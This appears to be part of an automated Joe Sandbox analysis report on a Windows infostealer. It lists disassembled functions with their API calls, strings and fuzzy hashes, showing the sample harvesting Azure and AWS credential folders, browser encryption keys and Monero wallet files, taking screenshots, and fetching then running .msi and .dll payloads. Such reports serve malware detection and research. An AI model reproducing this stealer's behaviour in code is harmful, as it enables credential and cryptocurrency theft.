                              • StrStrA.SHLWAPI(?,013DDF98,00000000,?,00661458,00000000,?,00000000,00000000,?,013D8BC8,00000000,?,00661454,00000000,?), ref: 0064CCA2
                              • StrStrA.SHLWAPI(00000000,013DDD18), ref: 0064CCB9
                                • Part of subcall function 0064C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0064C871
                                • Part of subcall function 0064C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0064C87C
                              • StrStrA.SHLWAPI(?,013DDD18,00000000,?,0066145C,00000000,?,00000000,013D8AF8), ref: 0064CD5A
                              • StrStrA.SHLWAPI(00000000,013D8958), ref: 0064CD71
                                • Part of subcall function 0064C820: lstrcat.KERNEL32(?,00660B46), ref: 0064C943
                                • Part of subcall function 0064C820: lstrcat.KERNEL32(?,00660B47), ref: 0064C957
                                • Part of subcall function 0064C820: lstrcat.KERNEL32(?,00660B4E), ref: 0064C978
                              • lstrlen.KERNEL32(00000000), ref: 0064CE44
                              • CloseHandle.KERNEL32(00000000), ref: 0064CE9C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                              • String ID:
                              • API String ID: 3744635739-3916222277
                              • Opcode ID: 9795c9a696e620afd098adc12a91c653aef8e638427be970a993cbd013963edd
                              • Instruction ID: 41327d159daaeb04a88299853339ada3c2609e7cd85b34139e2f5443dc456330
                              • Opcode Fuzzy Hash: 9795c9a696e620afd098adc12a91c653aef8e638427be970a993cbd013963edd
                              • Instruction Fuzzy Hash: 26E10F71810108ABDB58EBE4DC95FEEB77ABF14301F40425DF506A7191EF306A4ACB6A
                              Function 00658320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0065A740: lstrcpy.KERNEL32(00660E17,00000000), ref: 0065A788
                              • RegOpenKeyExA.ADVAPI32(00000000,013DB900,00000000,00020019,00000000,006605B6), ref: 006583A4
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00658426
                              • wsprintfA.USER32 ref: 00658459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0065847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 0065848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 00658499
                                • Part of subcall function 0065A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0065A7E6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseOpenlstrcpy$Enumwsprintf
                              • String ID: - $%s\%s$?
                              • API String ID: 3246050789-3278919252
                              • Opcode ID: 705797e986393216d71b0b36741393d5662f194f53e7728403ca7c064f897d52
                              • Instruction ID: 5988075127cfeef5d142ede20c31baea0df3a6362fdac60d8f1ed39172dc04a4
                              • Opcode Fuzzy Hash: 705797e986393216d71b0b36741393d5662f194f53e7728403ca7c064f897d52
                              • Instruction Fuzzy Hash: 8A814D719111189FEB68DB94CC81FEAB7B9BF08701F008299E509A6180DF716F89CFA5
                              Function 00654D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00658DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00658E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00654DB0
                              • lstrcat.KERNEL32(?,\.azure\), ref: 00654DCD
                                • Part of subcall function 00654910: wsprintfA.USER32 ref: 0065492C
                                • Part of subcall function 00654910: FindFirstFileA.KERNEL32(?,?), ref: 00654943
                              • lstrcat.KERNEL32(?,00000000), ref: 00654E3C
                              • lstrcat.KERNEL32(?,\.aws\), ref: 00654E59
                                • Part of subcall function 00654910: StrCmpCA.SHLWAPI(?,00660FDC), ref: 00654971
                                • Part of subcall function 00654910: StrCmpCA.SHLWAPI(?,00660FE0), ref: 00654987
                                • Part of subcall function 00654910: FindNextFileA.KERNEL32(000000FF,?), ref: 00654B7D
                                • Part of subcall function 00654910: FindClose.KERNEL32(000000FF), ref: 00654B92
                              • lstrcat.KERNEL32(?,00000000), ref: 00654EC8
                              • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00654EE5
                                • Part of subcall function 00654910: wsprintfA.USER32 ref: 006549B0
                                • Part of subcall function 00654910: StrCmpCA.SHLWAPI(?,006608D2), ref: 006549C5
                                • Part of subcall function 00654910: wsprintfA.USER32 ref: 006549E2
                                • Part of subcall function 00654910: PathMatchSpecA.SHLWAPI(?,?), ref: 00654A1E
                                • Part of subcall function 00654910: lstrcat.KERNEL32(?,013DECA0), ref: 00654A4A
                                • Part of subcall function 00654910: lstrcat.KERNEL32(?,00660FF8), ref: 00654A5C
                                • Part of subcall function 00654910: lstrcat.KERNEL32(?,?), ref: 00654A70
                                • Part of subcall function 00654910: lstrcat.KERNEL32(?,00660FFC), ref: 00654A82
                                • Part of subcall function 00654910: lstrcat.KERNEL32(?,?), ref: 00654A96
                                • Part of subcall function 00654910: CopyFileA.KERNEL32(?,?,00000001), ref: 00654AAC
                                • Part of subcall function 00654910: DeleteFileA.KERNEL32(?), ref: 00654B31
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                              • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                              • API String ID: 949356159-974132213
                              • Opcode ID: 2d48f573ef38364cfce79fadd89e2671b01a913688731a2e74f2fdcd724db0ed
                              • Instruction ID: 6d83630a1bfffd524a0c6b1415876b6f268657687909ab70e069bf2421200f80
                              • Opcode Fuzzy Hash: 2d48f573ef38364cfce79fadd89e2671b01a913688731a2e74f2fdcd724db0ed
                              • Instruction Fuzzy Hash: 8641C6B994020867DB54F760EC57FED7339AB24701F404598B545660C2FEB45BCD8BA2
                              Function 00659010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                              Download Yara Rule
                              APIs
                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0065906C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateGlobalStream
                              • String ID: image/jpeg
                              • API String ID: 2244384528-3785015651
                              • Opcode ID: fd90dd2f0d54e55a6fda0ac8845f318eaa2710d4539d1d4952ddf7f5b8e73e2a
                              • Instruction ID: 754dc63445fcfa1e87c058ca3a88018a82629fb0faa548832fc17da98bb74184
                              • Opcode Fuzzy Hash: fd90dd2f0d54e55a6fda0ac8845f318eaa2710d4539d1d4952ddf7f5b8e73e2a
                              • Instruction Fuzzy Hash: B47111B1910208EBDB18EFE8DC89FEDB7B9BF48301F108519F515AB294DB34A945CB61
                              Function 00652E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0065A740: lstrcpy.KERNEL32(00660E17,00000000), ref: 0065A788
                              • ShellExecuteEx.SHELL32(0000003C), ref: 006531C5
                              • ShellExecuteEx.SHELL32(0000003C), ref: 0065335D
                              • ShellExecuteEx.SHELL32(0000003C), ref: 006534EA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExecuteShell$lstrcpy
                              • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                              • API String ID: 2507796910-3625054190
                              • Opcode ID: 23cbc8c90207ba418da0f865142d76d24b02374c1d86fa8284c3659ab1c887d2
                              • Instruction ID: af71f958040f545886f39a740ec46f60000b36a2d95794eb72f1020c66896d40
                              • Opcode Fuzzy Hash: 23cbc8c90207ba418da0f865142d76d24b02374c1d86fa8284c3659ab1c887d2
                              • Instruction Fuzzy Hash: B5120E718101189ADB49EBE0DC92FDEB77AAF14301F50426DE90666191EF302B4ECB56
                              Function 006552C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0065A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0065A7E6
                                • Part of subcall function 00646280: InternetOpenA.WININET(00660DFE,00000001,00000000,00000000,00000000), ref: 006462E1
                                • Part of subcall function 00646280: StrCmpCA.SHLWAPI(?,013DEC50), ref: 00646303
                                • Part of subcall function 00646280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00646335
                                • Part of subcall function 00646280: HttpOpenRequestA.WININET(00000000,GET,?,013DE238,00000000,00000000,00400100,00000000), ref: 00646385
                                • Part of subcall function 00646280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 006463BF
                                • Part of subcall function 00646280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006463D1
                                • Part of subcall function 0065A8A0: lstrcpy.KERNEL32(?,00660E17), ref: 0065A905
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00655318
                              • lstrlen.KERNEL32(00000000), ref: 0065532F
                                • Part of subcall function 00658E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00658E52
                              • StrStrA.SHLWAPI(00000000,00000000), ref: 00655364
                              • lstrlen.KERNEL32(00000000), ref: 00655383
                              • lstrlen.KERNEL32(00000000), ref: 006553AE
                                • Part of subcall function 0065A740: lstrcpy.KERNEL32(00660E17,00000000), ref: 0065A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 3240024479-1526165396
                              • Opcode ID: 30e590ea92e3cd850887fde28c16a2b63ba12efdb8db9d2fd1ca6e22580ae5b8
                              • Instruction ID: 31c2268e95303e83e1313c1abbb9d321029c4a2dd98499cf1e1b88d9bb0adbc9
                              • Opcode Fuzzy Hash: 30e590ea92e3cd850887fde28c16a2b63ba12efdb8db9d2fd1ca6e22580ae5b8
                              • Instruction Fuzzy Hash: D1511D709101489BDB58FFA4CD96AED777ABF10302F50411CFC065A592EF346B4ACB66
                              Function 006512D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: 22cf7516d3229fffe5ad7e06be193a78da0cfc8164cf74e4ba60f36a15bb7066
                              • Instruction ID: 20053c7ebaddde8923105d76450c0de58a45229095f13401a6da31959d3152c2
                              • Opcode Fuzzy Hash: 22cf7516d3229fffe5ad7e06be193a78da0cfc8164cf74e4ba60f36a15bb7066
                              • Instruction Fuzzy Hash: FDC1E8B590010D9BCB58EF60DC89FEA7779BF54301F00459DF90A67281EB70AA89CF95
                              Function 00654280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00658DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00658E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 006542EC
                              • lstrcat.KERNEL32(?,013DE658), ref: 0065430B
                              • lstrcat.KERNEL32(?,?), ref: 0065431F
                              • lstrcat.KERNEL32(?,013DD438), ref: 00654333
                                • Part of subcall function 0065A740: lstrcpy.KERNEL32(00660E17,00000000), ref: 0065A788
                                • Part of subcall function 00658D90: GetFileAttributesA.KERNEL32(00000000,?,00641B54,?,?,0066564C,?,?,00660E1F), ref: 00658D9F
                                • Part of subcall function 00649CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00649D39
                                • Part of subcall function 006499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006499EC
                                • Part of subcall function 006499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00649A11
                                • Part of subcall function 006499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00649A31
                                • Part of subcall function 006499C0: ReadFile.KERNEL32(000000FF,?,00000000,0064148F,00000000), ref: 00649A5A
                                • Part of subcall function 006499C0: LocalFree.KERNEL32(0064148F), ref: 00649A90
                                • Part of subcall function 006499C0: CloseHandle.KERNEL32(000000FF), ref: 00649A9A
                                • Part of subcall function 006593C0: GlobalAlloc.KERNEL32(00000000,006543DD,006543DD), ref: 006593D3
                              • StrStrA.SHLWAPI(?,013DE718), ref: 006543F3
                              • GlobalFree.KERNEL32(?), ref: 00654512
                                • Part of subcall function 00649AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nd,00000000,00000000), ref: 00649AEF
                                • Part of subcall function 00649AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00644EEE,00000000,?), ref: 00649B01
                                • Part of subcall function 00649AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nd,00000000,00000000), ref: 00649B2A
                                • Part of subcall function 00649AC0: LocalFree.KERNEL32(?,?,?,?,00644EEE,00000000,?), ref: 00649B3F
                              • lstrcat.KERNEL32(?,00000000), ref: 006544A3
                              • StrCmpCA.SHLWAPI(?,006608D1), ref: 006544C0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 006544D2
                              • lstrcat.KERNEL32(00000000,?), ref: 006544E5
                              • lstrcat.KERNEL32(00000000,00660FB8), ref: 006544F4
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                              • String ID:
                              • API String ID: 3541710228-0
                              • Opcode ID: e93b24cbc843f7c7244e730afabf9c171da5920d61c44265c2e4d6efa3a1acf2
                              • Instruction ID: 8b70431e3a2895c97ff8a0e87c902ee9aebcdf367422cd29f602bf9a94ebf7fa
                              • Opcode Fuzzy Hash: e93b24cbc843f7c7244e730afabf9c171da5920d61c44265c2e4d6efa3a1acf2
                              • Instruction Fuzzy Hash: 987155B6900208ABDB54EBE4DC85FEE737ABB48301F04459DF605A7181EA34DB49CFA5
                              Function 00641310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 006412A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 006412B4
                                • Part of subcall function 006412A0: RtlAllocateHeap.NTDLL(00000000), ref: 006412BB
                                • Part of subcall function 006412A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 006412D7
                                • Part of subcall function 006412A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 006412F5
                                • Part of subcall function 006412A0: RegCloseKey.ADVAPI32(?), ref: 006412FF
                              • lstrcat.KERNEL32(?,00000000), ref: 0064134F
                              • lstrlen.KERNEL32(?), ref: 0064135C
                              • lstrcat.KERNEL32(?,.keys), ref: 00641377
                                • Part of subcall function 0065A740: lstrcpy.KERNEL32(00660E17,00000000), ref: 0065A788
                                • Part of subcall function 0065A9B0: lstrlen.KERNEL32(?,013D8948,?,\Monero\wallet.keys,00660E17), ref: 0065A9C5
                                • Part of subcall function 0065A9B0: lstrcpy.KERNEL32(00000000), ref: 0065AA04
                                • Part of subcall function 0065A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0065AA12
                                • Part of subcall function 0065A8A0: lstrcpy.KERNEL32(?,00660E17), ref: 0065A905
                                • Part of subcall function 00658B60: GetSystemTime.KERNEL32(00660E1A,013DF0B8,006605AE,?,?,006413F9,?,0000001A,00660E1A,00000000,?,013D8948,?,\Monero\wallet.keys,00660E17), ref: 00658B86
